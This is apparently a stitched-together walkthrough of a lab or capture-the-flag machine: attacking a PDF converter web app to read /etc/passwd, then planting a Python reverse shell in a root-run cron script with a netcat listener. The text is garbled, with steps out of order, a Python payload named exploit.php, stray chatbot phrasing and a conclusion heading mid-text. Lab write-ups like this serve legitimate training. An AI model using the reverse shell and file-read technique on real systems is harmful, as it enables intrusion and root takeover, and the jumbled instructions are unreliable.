chmod

Create an exploit.php script on your public-facing web server with the following code:

import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.x.x",4445)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]); Use code with caution. Set up a new listener: nc -lvnp 4445 Wait for the cron job to execute, giving us a root shell. 6. Conclusion and Key Takeaways

Next, we access the web application hosted on port 80. The website appears to be a simple PDF converter, allowing users to upload PDF files and convert them to other formats. However, upon closer inspection, we notice that the website uses a peculiar URL parameter, file , which seems to be vulnerable to path traversal attacks.

We discover a script that runs a Python command or parses a file we can modify. Locate a script that is executed by root. Modify the script to include a reverse shell:

The backend returns the newly generated PDF filename. When you open or view the document in the provided , you will see a text printout of the server’s /etc/passwd configuration file right on your screen.

The server responds with a PDF file, which is placed at /static/pdfs/<random_hash>.pdf . This flow shows that the backend fetches the provided URL, converts the content into a PDF, and stores it for retrieval.

Create a file named index.html in the root of your local web server's directory.